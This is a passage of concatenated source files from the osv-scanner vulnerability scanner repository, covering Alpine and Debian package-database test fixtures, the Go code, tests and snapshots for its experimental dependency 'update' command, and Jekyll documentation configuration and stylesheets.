pkg:apk/alpine/libc-utils@0.7.2-r3?arch=x86_64&upstream=libc-dev&distro=alpine-3.17.2 https://alpinelinux.org apkdb-cataloger ApkMetadata apk cpe:2.3:a:libc-utils:libc_utils:0.7.2-r3:*:*:*:*:*:*:* cpe:2.3:a:libc_utils:libc-utils:0.7.2-r3:*:*:*:*:*:*:* 
cpe:2.3:a:libc_utils:libc_utils:0.7.2-r3:*:*:*:*:*:*:* cpe:2.3:a:libc:libc-utils:0.7.2-r3:*:*:*:*:*:*:* cpe:2.3:a:libc:libc_utils:0.7.2-r3:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 60424133be2e79bbfeff3d58147a22886f817ce2 4096 libc-dev Q19Gg06pBPiiG9UN94ql7qImsHSUQ= musl-utils 1485 Ariadne Conill <ariadne@dereferenced.org> libcrypto3 3.0.8-r0 Crypto library from openssl Apache-2.0 cpe:2.3:a:libcrypto3:libcrypto3:3.0.8-r0:*:*:*:*:*:*:* pkg:apk/alpine/libcrypto3@3.0.8-r0?arch=x86_64&upstream=openssl&distro=alpine-3.17.2 https://www.openssl.org/ apkdb-cataloger ApkMetadata apk sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 524302e205a5b43c2bb48d041bcb10ccf2b480f9 4206592 openssl so:libcrypto.so.3=3 Q1lyWpurYeMlLEt60ys+OlTABmzgs= so:libc.musl-x86_64.so.1 1710217 Ariadne Conill <ariadne@dereferenced.org> libssl3 3.0.8-r0 SSL shared libraries Apache-2.0 cpe:2.3:a:libssl3:libssl3:3.0.8-r0:*:*:*:*:*:*:* pkg:apk/alpine/libssl3@3.0.8-r0?arch=x86_64&upstream=openssl&distro=alpine-3.17.2 https://www.openssl.org/ apkdb-cataloger ApkMetadata apk sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed 524302e205a5b43c2bb48d041bcb10ccf2b480f9 622592 openssl so:libssl.so.3=3 Q1Z6/d/FKYkPehWzNtOtYnJ74oIkY= so:libc.musl-x86_64.so.1 so:libcrypto.so.3 246853 Timo Teräs <timo.teras@iki.fi> musl 1.2.3-r4 the musl c library (libc) implementation MIT cpe:2.3:a:musl:musl:1.2.3-r4:*:*:*:*:*:*:* pkg:apk/alpine/musl@1.2.3-r4?arch=x86_64&upstream=musl&distro=alpine-3.17.2 https://musl.libc.org/ apkdb-cataloger ApkMetadata apk sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed f93af038c3de7146121c2ea8124ba5ce29b4b058 634880 musl so:libc.musl-x86_64.so.1=1 Q1Pk7x1woArbB1nzkMPJPq1TECwus= 388955 Timo Teräs <timo.teras@iki.fi> musl-utils 1.2.3-r4 the musl c library (libc) implementation MIT BSD-2-Clause 
GPL-2.0-or-later cpe:2.3:a:musl-utils:musl-utils:1.2.3-r4:*:*:*:*:*:*:* pkg:apk/alpine/musl-utils@1.2.3-r4?arch=x86_64&upstream=musl&distro=alpine-3.17.2 https://musl.libc.org/ apkdb-cataloger ApkMetadata apk cpe:2.3:a:musl-utils:musl_utils:1.2.3-r4:*:*:*:*:*:*:* cpe:2.3:a:musl_utils:musl-utils:1.2.3-r4:*:*:*:*:*:*:* cpe:2.3:a:musl_utils:musl_utils:1.2.3-r4:*:*:*:*:*:*:* cpe:2.3:a:musl:musl-utils:1.2.3-r4:*:*:*:*:*:*:* cpe:2.3:a:musl:musl_utils:1.2.3-r4:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed f93af038c3de7146121c2ea8124ba5ce29b4b058 135168 musl cmd:getconf=1.2.3-r4 cmd:getent=1.2.3-r4 cmd:iconv=1.2.3-r4 cmd:ldconfig=1.2.3-r4 cmd:ldd=1.2.3-r4 Q1ZWJL4eySx8nPSjF1FAJgQyvuNs4= scanelf so:libc.musl-x86_64.so.1 36697 Natanael Copa <ncopa@alpinelinux.org> scanelf 1.3.5-r1 Scan ELF binaries for stuff GPL-2.0-only cpe:2.3:a:scanelf:scanelf:1.3.5-r1:*:*:*:*:*:*:* pkg:apk/alpine/scanelf@1.3.5-r1?arch=x86_64&upstream=pax-utils&distro=alpine-3.17.2 https://wiki.gentoo.org/wiki/Hardened/PaX_Utilities apkdb-cataloger ApkMetadata apk sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed e52243dbb02069f10d48440ccc5fd41fa5fc2236 98304 pax-utils cmd:scanelf=1.3.5-r1 Q11dxYFsHvBFAzzHGDo5gOTDNJDyQ= so:libc.musl-x86_64.so.1 37687 Sören Tempel <soeren+alpine@soeren-tempel.net> ssl_client 1.36.1-r27 EXternal ssl_client for busybox wget GPL-2.0-only cpe:2.3:a:ssl-client:ssl-client:1.36.1-r27:*:*:*:*:*:*:* pkg:apk/alpine/ssl_client@1.36.1-r27?arch=x86_64&upstream=busybox&distro=alpine-3.17.2 https://busybox.net/ apkdb-cataloger ApkMetadata apk cpe:2.3:a:ssl-client:ssl_client:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:ssl_client:ssl-client:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:ssl_client:ssl_client:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:ssl:ssl-client:1.36.1-r27:*:*:*:*:*:*:* cpe:2.3:a:ssl:ssl_client:1.36.1-r27:*:*:*:*:*:*:* sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 
/lib/apk/db/installed 1dbf7a793afae640ea643a055b6dd4f430ac116b 28672 busybox cmd:ssl_client=1.36.1-r27 Q1QuqZjeP6XG85I29tOiCWofL8Cj0= so:libc.musl-x86_64.so.1 so:libcrypto.so.3 so:libssl.so.3 4929 Natanael Copa <ncopa@alpinelinux.org> zlib 1.2.13-r0 A compression/decompression Library Zlib cpe:2.3:a:zlib:zlib:1.2.13-r0:*:*:*:*:*:*:* pkg:apk/alpine/zlib@1.2.13-r0?arch=x86_64&upstream=zlib&distro=alpine-3.17.2 https://zlib.net/ apkdb-cataloger ApkMetadata apk sha256:7cd52847ad775a5ddc4b58326cf884beee34544296402c6292ed76474c686d39 /lib/apk/db/installed bb37266b06a72d21d1fd850ef4b86665cf9ef70f 110592 zlib so:libz.so.1=1.2.13 Q1rjnXT01l1PAxXheUxe4Oldl5rFk= so:libc.musl-x86_64.so.1 54258 alpine 3.17.2 Alpine Linux v3.17 https://gitlab.alpinelinux.org/alpine/aports/-/issues https://alpinelinux.org/ alpine Alpine Linux v3.17 3.17.2 ================================================ FILE: cmd/osv-scanner/testdata/locks-many/installed ================================================ C:Q1Ef3iwt+cMdGngEgaFr2URIJhKzQ= P:apk-tools V:2.12.10-r1 A:x86_64 S:120973 I:307200 T:Alpine Package Keeper - package manager for alpine U:https://gitlab.alpinelinux.org/alpine/apk-tools L:GPL-2.0-only o:apk-tools m:Natanael Copa t:1666552494 c:0188f510baadbae393472103427b9c1875117136 D:musl>=1.2 ca-certificates-bundle so:libc.musl-x86_64.so.1 so:libcrypto.so.3 so:libssl.so.3 so:libz.so.1 p:so:libapk.so.3.12.0=3.12.0 cmd:apk=2.12.10-r1 F:etc F:etc/apk F:etc/apk/keys F:etc/apk/protected_paths.d F:lib R:libapk.so.3.12.0 a:0:0:755 Z:Q1opjpYqXgzmOVo7EbNe8l5Xol08g= F:lib/apk F:lib/apk/exec F:sbin R:apk a:0:0:755 Z:Q1/4bmOPe/H1YhHRzlrj27oufThMw= F:var F:var/lib F:var/lib/apk ================================================ FILE: cmd/osv-scanner/testdata/locks-many/not-a-lockfile.toml ================================================ _="whatever this is, it's not a lockfile!" 
================================================ FILE: cmd/osv-scanner/testdata/locks-many/osv-scanner.toml ================================================ [[PackageOverrides]] ignore = true ================================================ FILE: cmd/osv-scanner/testdata/locks-many/replace-local.mod ================================================ require ( golang.org/x/net v1.2.3 ) replace ( golang.org/x/net v1.2.3 => ./fork/net ) ================================================ FILE: cmd/osv-scanner/testdata/locks-many/status ================================================ Package: adduser Status: install ok installed Priority: important Section: admin Installed-Size: 849 Maintainer: redacted Architecture: all Multi-Arch: foreign Version: 3.118 Depends: passwd, debconf (>= 0.5) | debconf-2.0 Suggests: liblocale-gettext-perl, perl Conffiles: /etc/deluser.conf 773fb95e98a27947de4a95abb3d3f2a2 Description: add and remove users and groups This package includes the 'adduser' and 'deluser' commands for creating and removing users. . - 'adduser' creates new users and groups and adds existing users to existing groups; - 'deluser' removes users and groups and removes users from a given group. . Adding users with 'adduser' is much easier than adding them manually. Adduser will choose appropriate UID and GID values, create a home directory, copy skeletal user configuration, and automate setting initial values for the user's password, real name and so on. . Deluser can back up and remove users' home directories and mail spool or all the files they own on the system. . A custom script can be executed after each of the commands. 
================================================ FILE: cmd/osv-scanner/testmain_test.go ================================================ package main import ( "log/slog" "testing" "github.com/google/osv-scanner/v2/cmd/osv-scanner/fix" "github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/cmd" "github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/testcmd" "github.com/google/osv-scanner/v2/cmd/osv-scanner/scan" "github.com/google/osv-scanner/v2/cmd/osv-scanner/update" "github.com/google/osv-scanner/v2/internal/config" "github.com/google/osv-scanner/v2/internal/testlogger" "github.com/google/osv-scanner/v2/internal/testutility" ) /* TestMain is the test entry point for package main. It sets config.OSVScannerConfigName to "osv-scanner-test.toml", sets up the git fixtures, installs the test logger as the slog default, registers scan.Command, fix.Command and update.Command as the commands under test, runs the tests, then removes the git fixtures and calls testutility.CleanSnapshots. NOTE(review): the error branch calls cleanupGitFixtures() before panic(err); this assumes SetupGitFixtures returns a non-nil cleanup func even when it fails - confirm, otherwise the nil call would mask the original error. The result of m.Run() is not passed to os.Exit here; since Go 1.15 the test wrapper does that itself when TestMain returns. */ func TestMain(m *testing.M) { config.OSVScannerConfigName = "osv-scanner-test.toml" cleanupGitFixtures, err := testcmd.SetupGitFixtures() if err != nil { cleanupGitFixtures() panic(err) } slog.SetDefault(slog.New(testlogger.New())) testcmd.CommandsUnderTest = []cmd.CommandBuilder{ scan.Command, fix.Command, update.Command, } m.Run() cleanupGitFixtures() testutility.CleanSnapshots(m) } ================================================ FILE: cmd/osv-scanner/update/__snapshots__/command_test.snap ================================================ [TestCommand/errors_with_invalid_data_source - 1] --- [TestCommand/errors_with_invalid_data_source - 2] unsupported data-source "github" - must be one of: deps.dev, native --- [TestCommand/errors_with_invalid_data_source - 3] 4.0.0 com.mycompany.app my-app 1.0.0 my-app http://www.example.com UTF-8 1.7 1.7 4.12 com.fasterxml.jackson.core jackson-core 2.14.0 junit junit ${junit.version} test org.slf4j slf4j-migrator 2.0.0 some-profile org.apache.logging.log4j log4j-api 2.0 --- [TestCommand/file_does_not_exist - 1] --- [TestCommand/file_does_not_exist - 2] file not found: ./testdata/does_not_exist.xml --- [TestCommand/update_pom.xml_with_in-place_changes - 1] --- [TestCommand/update_pom.xml_with_in-place_changes - 2] --- [TestCommand/update_pom.xml_with_in-place_changes - 3] 4.0.0 com.mycompany.app 
my-app 1.0.0 my-app http://www.example.com UTF-8 1.7 1.7 4.13.2 com.fasterxml.jackson.core jackson-core 2.21.1 junit junit ${junit.version} test org.slf4j slf4j-migrator 2.1.0-alpha1 some-profile org.apache.logging.log4j log4j-api 3.0.0-beta2 --- [TestCommand/update_pom_with_in_place_changes_using_deps_dev_data_source - 1] --- [TestCommand/update_pom_with_in_place_changes_using_deps_dev_data_source - 2] --- [TestCommand/update_pom_with_in_place_changes_using_deps_dev_data_source - 3] 4.0.0 com.mycompany.app my-app 1.0.0 my-app http://www.example.com UTF-8 1.7 1.7 4.13.2 com.fasterxml.jackson.core jackson-core 2.21.1 junit junit ${junit.version} test org.slf4j slf4j-migrator 2.1.0-alpha1 some-profile org.apache.logging.log4j log4j-api 3.0.0-beta2 --- [TestCommand/update_pom_with_in_place_changes_using_native_data_source - 1] --- [TestCommand/update_pom_with_in_place_changes_using_native_data_source - 2] --- [TestCommand/update_pom_with_in_place_changes_using_native_data_source - 3] 4.0.0 com.mycompany.app my-app 1.0.0 my-app http://www.example.com UTF-8 1.7 1.7 4.13.2 com.fasterxml.jackson.core jackson-core 2.21.1 junit junit ${junit.version} test org.slf4j slf4j-migrator 2.1.0-alpha1 some-profile org.apache.logging.log4j log4j-api 3.0.0-beta2 --- [TestCommand/with_no_arguments - 1] NAME: osv-scanner update - [EXPERIMENTAL] scans a manifest file then updates dependencies USAGE: osv-scanner update OPTIONS: --manifest string, -M string path to manifest file (required) --ignore-dev whether to ignore development dependencies for updates --upgrade-config [package-name:]level [ --upgrade-config [package-name:]level ] the allowed package upgrades, in the format [package-name:]level. If package-name is omitted, level is applied to all packages. level must be one of (major, minor, patch, none). 
(default: major) --data-source string source to fetch package information from; value can be: deps.dev, native (default: "deps.dev") --help, -h show help --- [TestCommand/with_no_arguments - 2] Required flag "manifest" not set --- ================================================ FILE: cmd/osv-scanner/update/command.go ================================================ // Package update implements the `update` command for osv-scanner. package update import ( "context" "errors" "fmt" "io" "net/http" "os" "deps.dev/util/resolve" "github.com/google/osv-scanner/v2/internal/depsdev" "github.com/google/osv-scanner/v2/internal/remediation/suggest" "github.com/google/osv-scanner/v2/internal/remediation/upgrade" "github.com/google/osv-scanner/v2/internal/resolution/client" "github.com/google/osv-scanner/v2/internal/resolution/depfile" "github.com/google/osv-scanner/v2/internal/resolution/manifest" "github.com/google/osv-scanner/v2/internal/version" "github.com/urfave/cli/v3" ) func Command(_, _ io.Writer, _ *http.Client) *cli.Command { return &cli.Command{ Hidden: true, Name: "update", Usage: "[EXPERIMENTAL] scans a manifest file then updates dependencies", Flags: []cli.Flag{ &cli.StringFlag{ Name: "manifest", Aliases: []string{"M"}, Usage: "path to manifest file (required)", TakesFile: true, Required: true, }, &cli.BoolFlag{ Name: "ignore-dev", Usage: "whether to ignore development dependencies for updates", }, &cli.StringSliceFlag{ Name: "upgrade-config", Usage: "the allowed package upgrades, in the format `[package-name:]level`. If package-name is omitted, level is applied to all packages. 
level must be one of (major, minor, patch, none).", DefaultText: "major", }, &cli.StringFlag{ Name: "data-source", Usage: "source to fetch package information from; value can be: deps.dev, native", Value: "deps.dev", Action: func(_ context.Context, _ *cli.Command, s string) error { if s != "deps.dev" && s != "native" { return fmt.Errorf("unsupported data-source \"%s\" - must be one of: deps.dev, native", s) } return nil }, }, }, Action: action, } } /* updateOptions holds the settings for one run of the update command: the manifest path, whether development dependencies are ignored, the parsed upgrade config, the dependency client chosen from the data-source flag, and the manifest read/writer. */ type updateOptions struct { Manifest string IgnoreDev bool UpgradeConfig upgrade.Config // Allowed upgrade levels per package. Client client.DependencyClient ManifestRW manifest.ReadWriter } /* action runs the update command. It builds updateOptions from the flags, returns "file not found" when os.Stat reports that the manifest does not exist, obtains a manifest read/writer for the path, creates the dependency client for the selected data-source (deps.dev, or native, which in this switch supports only the Maven system), reads the manifest, asks the suggester for a patch and overwrites the manifest at the same path with it. The versions written are whatever the selected client returns; nothing in this function pins or verifies them, so the rewritten manifest should be reviewed before it is committed. NOTE(review): "maven-registry" is read with cmd.String twice, but it is not among the Flags declared in Command; confirm it is defined elsewhere, otherwise it is always empty. NOTE(review): command_test.snap shows pre-release versions (2.1.0-alpha1, 3.0.0-beta2) being written under the default upgrade-config; confirm that is intended. */ func action(ctx context.Context, cmd *cli.Command) error { options := updateOptions{ Manifest: cmd.String("manifest"), IgnoreDev: cmd.Bool("ignore-dev"), UpgradeConfig: upgrade.ParseUpgradeConfig(cmd.StringSlice("upgrade-config")), } if _, err := os.Stat(options.Manifest); errors.Is(err, os.ErrNotExist) { return fmt.Errorf("file not found: %s", options.Manifest) } else if err != nil { return err } system := resolve.UnknownSystem if options.Manifest != "" { rw, err := manifest.GetReadWriter(options.Manifest, cmd.String("maven-registry")) if err != nil { return err } options.ManifestRW = rw system = rw.System() } var err error switch cmd.String("data-source") { case "deps.dev": options.Client, err = client.NewDepsDevClient(depsdev.DepsdevAPI, "osv-scanner_update/"+version.OSVVersion) if err != nil { return err } case "native": switch system { case resolve.Maven: options.Client, err = client.NewMavenRegistryClient(cmd.String("maven-registry")) if err != nil { return err } case resolve.NPM, resolve.UnknownSystem: fallthrough default: return fmt.Errorf("native data-source currently unsupported for %s ecosystem", system.String()) } } df, err := depfile.OpenLocalDepFile(options.Manifest) if err != nil { return err } mf, err := options.ManifestRW.Read(df) df.Close() // Close the dep file and we may re-open it for writing if err != nil { 
return err } suggester, err := suggest.GetSuggester(mf.System()) if err != nil { return err } patch, err := suggester.Suggest(ctx, options.Client, mf, suggest.Options{ IgnoreDev: options.IgnoreDev, UpgradeConfig: options.UpgradeConfig, }) if err != nil { return err } return manifest.Overwrite(options.ManifestRW, options.Manifest, patch) } ================================================ FILE: cmd/osv-scanner/update/command_test.go ================================================ package update_test import ( "os" "testing" "github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/testcmd" "github.com/google/osv-scanner/v2/internal/testutility" ) func TestCommand(t *testing.T) { t.Parallel() tests := []testcmd.Case{ { Name: "with_no_arguments", Args: []string{"", "update"}, Exit: 127, }, { Name: "update_pom.xml_with_in-place_changes", Args: []string{"", "update", "-M=./testdata/pom.xml"}, Exit: 0, }, { Name: "update_pom_with_in_place_changes_using_deps_dev_data_source", Args: []string{"", "update", "--data-source", "deps.dev", "-M", "./testdata/pom.xml"}, Exit: 0, }, { Name: "update_pom_with_in_place_changes_using_native_data_source", Args: []string{"", "update", "--data-source", "native", "-M", "./testdata/pom.xml"}, Exit: 0, }, { Name: "errors_with_invalid_data_source", Args: []string{"", "update", "--data-source", "github", "-M", "./testdata/pom.xml"}, Exit: 127, }, { Name: "file_does_not_exist", Args: []string{"", "update", "-M", "./testdata/does_not_exist.xml"}, Exit: 127, }, // TODO: add other test cases. } for _, tt := range tests { t.Run(tt.Name, func(t *testing.T) { t.Parallel() // Update action overwrites files, copy them to a temporary directory. 
testDir := testutility.CreateTestDir(t) manifest := testcmd.CopyFileFlagTo(t, tt, "-M", testDir) testcmd.RunAndMatchSnapshots(t, tt) if manifest != "" { b, err := os.ReadFile(manifest) if err != nil { t.Fatalf("could not read test file: %v", err) } testutility.NewSnapshot().WithCRLFReplacement().MatchText(t, string(b)) } }) } } ================================================ FILE: cmd/osv-scanner/update/testdata/osv-scanner.toml ================================================ [[PackageOverrides]] ignore = true ================================================ FILE: cmd/osv-scanner/update/testdata/pom.xml ================================================ 4.0.0 com.mycompany.app my-app 1.0.0 my-app http://www.example.com UTF-8 1.7 1.7 4.12 com.fasterxml.jackson.core jackson-core 2.14.0 junit junit ${junit.version} test org.slf4j slf4j-migrator 2.0.0 some-profile org.apache.logging.log4j log4j-api 2.0 ================================================ FILE: cmd/osv-scanner/update/testmain_test.go ================================================ package update_test import ( "log/slog" "testing" "github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/cmd" "github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/testcmd" "github.com/google/osv-scanner/v2/cmd/osv-scanner/update" "github.com/google/osv-scanner/v2/internal/testlogger" "github.com/google/osv-scanner/v2/internal/testutility" ) func TestMain(m *testing.M) { slog.SetDefault(slog.New(testlogger.New())) testcmd.CommandsUnderTest = []cmd.CommandBuilder{update.Command} m.Run() testutility.CleanSnapshots(m) } ================================================ FILE: docs/.gitignore ================================================ _site .sass-cache .jekyll-cache .jekyll-metadata vendor ================================================ FILE: docs/404.html ================================================ --- permalink: /404.html layout: default ---

404

Page not found

The requested page could not be found.

================================================ FILE: docs/Gemfile ================================================ ruby "~> 3" source "https://rubygems.org" # Hello! This is where you manage which Jekyll version is used to run. # When you want to use a different version, change it below, save the # file and run `bundle install`. Run Jekyll with `bundle exec`, like so: # # bundle exec jekyll serve # # This will help ensure the proper Jekyll version is running. # Happy Jekylling! # gem "jekyll", "~> 4.3.2" # This is the default theme for new Jekyll sites. You may change this to anything you like. # If you want to use GitHub Pages, remove the "gem "jekyll"" above and # uncomment the line below. To upgrade, run `bundle update github-pages`. gem "github-pages", "~> 232", group: :jekyll_plugins # If you have any plugins, put them here! group :jekyll_plugins do gem "jekyll-feed", "~> 0.15" end # Windows and JRuby does not include zoneinfo files, so bundle the tzinfo-data gem # and associated library. platforms :mingw, :x64_mingw, :mswin, :jruby do gem "tzinfo", ">= 1", "< 3" gem "tzinfo-data" end # Performance-booster for watching directories on Windows gem "wdm", "~> 0.2.0", :platforms => [:mingw, :x64_mingw, :mswin] # Lock `http_parser.rb` gem to `v0.6.x` on JRuby builds since newer versions of the gem # do not have a Java counterpart. gem "http_parser.rb", "~> 0.8.0", :platforms => [:jruby] gem "webrick", "~> 1.7" ================================================ FILE: docs/README.md ================================================ # README The [OSV-Scanner docs](https://google.github.io/osv-scanner) are hosted on a [GitHub page](https://pages.github.com/). ## Running docs locally (docker) You can run the docs locally consistently through docker: ```bash docker build -t osv-scanner-docs -f docs.Dockerfile . docker run -p 4000:4000 osv-scanner-docs ``` ## Running docs locally (native) To run the docs locally, use : - Install `ruby (>= 3.1.0)`. 
This should come with `bundler`. - On Debian, you need to install them separately: - `ruby` - `ruby-bundler` - In this directory: - `bundle config set --local path 'vendor/bundle'` (you can skip this step if serving from this directory, as the config is already saved in `.bundle/config`) - `bundle install` - `bundle exec jekyll serve` Here's the full documentation on github for running the [docs locally]. [docs locally]: https://docs.github.com/en/pages/setting-up-a-github-pages-site-with-jekyll/testing-your-github-pages-site-locally-with-jekyll#building-your-site-locally ## Formatting docs We use [Prettier](https://prettier.io/) to standardize the format of markdown and config files. This requires [node/npm](https://docs.npmjs.com/downloading-and-installing-node-js-and-npm) to be installed. ### Running the formatter Run the following in the project directory: ```shell ./scripts/run_formatters.sh ``` ## Documentation theme We are using the [Just the Docs](https://just-the-docs.github.io/just-the-docs/) theme. ================================================ FILE: docs/_config.yml ================================================ # Welcome to Jekyll! # # This config file is meant for settings that affect your whole blog, values # which you are expected to set up once and rarely edit after that. If you find # yourself editing this file very often, consider using Jekyll's data files # feature for the data you need to update frequently. # # For technical reasons, this file is *NOT* reloaded automatically when you use # 'bundle exec jekyll serve'. If you change this file, please restart the server process. # # If you need help with YAML syntax, here are some quick references for you: # https://learn-the-web.algonquindesign.ca/topics/markdown-yaml-cheat-sheet/#yaml # https://learnxinyminutes.com/docs/yaml/ # # Site settings # These are used to personalize your new site. 
If you look in the HTML files, # you will see them accessed via {{ site.title }}, {{ site.email }}, and so on. # You can create any custom variable you would like, and they will be accessible # in the templates via {{ site.myvariable }}. title: OSV-Scanner description: >- # this means to ignore newlines until "baseurl:" Use OSV-Scanner to find existing vulnerabilities affecting your project's dependencies. baseurl: "/osv-scanner" # the subpath of your site, e.g. /blog url: "" # the base hostname & protocol for your site, e.g. http://example.com github_username: google ga_tracking: G-60SWD6J0TM # Build settings remote_theme: just-the-docs/just-the-docs plugins: - jekyll-feed color_scheme: custom_dark markdown: kramdown kramdown: toc_levels: 1..3 logo: "/assets/logo-dark.png" favicon_ico: "/assets/icon.png" callouts_level: quiet # or loud callouts: highlight: color: yellow important: title: Important color: blue new: title: New color: green note: title: Note color: purple warning: title: Warning color: red aux_links: "OSV-Scanner on GitHub": - https://github.com/google/osv-scanner nav_external_links: - title: OSV.dev url: https://osv.dev hide_icon: false # set to true to hide the external link icon - defaults to false - title: API docs url: https://osv.dev/docs/ hide_icon: false # set to true to hide the external link icon - defaults to false - title: OSV Schema url: https://ossf.github.io/osv-schema/ hide_icon: false # set to true to hide the external link icon - defaults to false # Exclude from processing. # The following items will not be processed, by default. # Any item listed under the `exclude:` key here will be automatically added to # the internal "default list". # # Excluded items can be processed by explicitly listing the directories or # their entries' file path in the `include:` list. 
# # exclude: # - .sass-cache/ # - .jekyll-cache/ # - gemfiles/ # - Gemfile # - Gemfile.lock # - node_modules/ # - vendor/bundle/ # - vendor/cache/ # - vendor/gems/ # - vendor/ruby/ ================================================ FILE: docs/_sass/color_schemes/_variables.scss ================================================ $white: #fff !default; $grey-dk-000: #959396 !default; $grey-dk-100: #5c5962 !default; $grey-dk-200: #44434d !default; $grey-dk-250: #302d36 !default; $grey-dk-300: #27262b !default; $grey-lt-000: #f5f6fa !default; $grey-lt-100: #eeebee !default; $grey-lt-200: #ecebed !default; $grey-lt-300: #e6e1e8 !default; $purple-000: #7253ed !default; $purple-100: #5e41d0 !default; $purple-200: #4e26af !default; // Override the default purple 300 for better visibility $purple-300: #d7c6ff; $blue-000: #2c84fa !default; $blue-100: #2869e6 !default; $blue-200: #264caf !default; $blue-300: #183385 !default; $green-000: #41d693 !default; $green-100: #11b584 !default; $green-200: #009c7b !default; $green-300: #026e57 !default; // Override the default yellow 000 for better visibility $yellow-000: #5f4f00; $yellow-100: #fadf50 !default; $yellow-200: #f7d12e !default; $yellow-300: #e7af06 !default; $red-000: #f77e7e !default; $red-100: #f96e65 !default; $red-200: #e94c4c !default; $red-300: #dd2e2e !default; $body-font-family: "Source Sans 3", system-ui, -apple-system, sans-serif; $mono-font-family: consolas, monospace; ================================================ FILE: docs/_sass/color_schemes/custom_dark.scss ================================================ @import "./variables"; @import "../highlight/native.scss"; @import url("https://fonts.googleapis.com/css2?family=Overpass:ital,wght@0,100..900;1,100..900&family=Source+Sans+3:ital,wght@0,200..900;1,200..900&display=swap"); $new-body-background-color: #292929; // Overriding dark default for just-the-docs styles $color-scheme: dark; $body-background-color: $new-body-background-color; // Replacing default 
$grey-dk-300 $body-heading-color: $white; // Replacing default $grey-lt-000 $body-text-color: $white; //Replacing default $grey-lt-300 $link-color: #c9f5f7; $nav-child-link-color: $white; // Replacing default $grey-dk-000 $sidebar-color: $new-body-background-color; //Replacing default $grey-dk-300 $base-button-color: $grey-dk-250; $btn-primary-color: $blue-200; $code-background-color: #202020; // Important to match with .highlight background and .highlight.err background-color $code-linenumber-color: #f5f6fa; // Important to match with .highlight.nf color $feedback-color: darken($sidebar-color, 3%); $table-background-color: lighten( $new-body-background-color, 5% ); // Replacing default $grey-dk-250 $search-background-color: $new-body-background-color; // Replacing default $grey-dk-250 $search-result-preview-color: $grey-dk-000; $border-color: #6a6a6a; // Replacing default $grey-dk-200 ================================================ FILE: docs/_sass/custom/custom.scss ================================================ // Always show child pages in the navigation menu // https://github.com/just-the-docs/just-the-docs/issues/245#issuecomment-656334333 .nav-list .nav-list-item > .nav-list { display: block !important; } // Hide the child page expand arrow, since it doesn't do anything .nav-list .nav-list-expander { display: none !important; } :not(pre, figure) code { padding: 0.2rem 0.35rem !important; font-size: 0.85em; } h1, h2, h3, h4 { font-family: "Overpass", system-ui, -apple-system, sans-serif; } table { border-collapse: collapse; th { border-bottom-width: 2px; } } .site-title { padding-top: 15px !important; } // Fix callout styling regression introduced in just-the-docs v0.11.0 which // replaced the colored background fill with an all-sides border outline. 
@mixin callout-fix($bg-color, $border-color) { border: none; border-left: $border-radius solid $border-color; background: rgba($bg-color, 0.2); } p.note, blockquote.note { @include callout-fix($purple-000, $purple-300); } p.warning, blockquote.warning { @include callout-fix($red-000, $red-300); } p.highlight, blockquote.highlight { @include callout-fix($yellow-000, $yellow-300); } ================================================ FILE: docs/_sass/highlight/native.scss ================================================ // Based on https://github.com/dwayne/sass-pygments/blob/master/styles/scss/native.scss .highlight, pre.highlight, .highlight code { color: #d0d0d0; background: #202020; .hll { background-color: #404040; } .c { color: #999999; font-style: italic; } .err { color: #d0d0d0; // Replacing default #a61717 with default text code for code block background-color: #202020; // Replacing default #e3d2d2 with background for the code block } .esc, .g { color: #d0d0d0; } .k { color: #6ab825; font-weight: bold; } .l, .n, .o, .x, .p { color: #d0d0d0; } .ch, .cm { color: #999999; font-style: italic; } .cp { color: #cd2828; font-weight: bold; } .cpf, .c1 { color: #999999; font-style: italic; } .cs { color: #e50808; font-weight: bold; background-color: #520000; } .gd { color: #d22323; } .ge { color: #d0d0d0; font-style: italic; } .gr { color: #d22323; } .gh { color: #ffffff; font-weight: bold; } .gi { color: #589819; } .go { color: #cccccc; } .gp { color: #aaaaaa; } .gs { color: #d0d0d0; font-weight: bold; } .gu { color: #ffffff; text-decoration: underline; } .gt { color: #d22323; } .kc, .kd, .kn { color: #6ab825; font-weight: bold; } .kp { color: #6ab825; } .kr, .kt { color: #6ab825; font-weight: bold; } .ld { color: #d0d0d0; } .m { color: #3677a9; } .s { color: #ed9d13; } .na { color: #bbbbbb; } .nb { color: #24909d; } .nc { color: #f5f6fa; text-decoration: underline; } .no { color: #40ffff; } .nd { color: #ffa500; } .ni { color: #d0d0d0; } .ne { color: #bbbbbb; } .nf { 
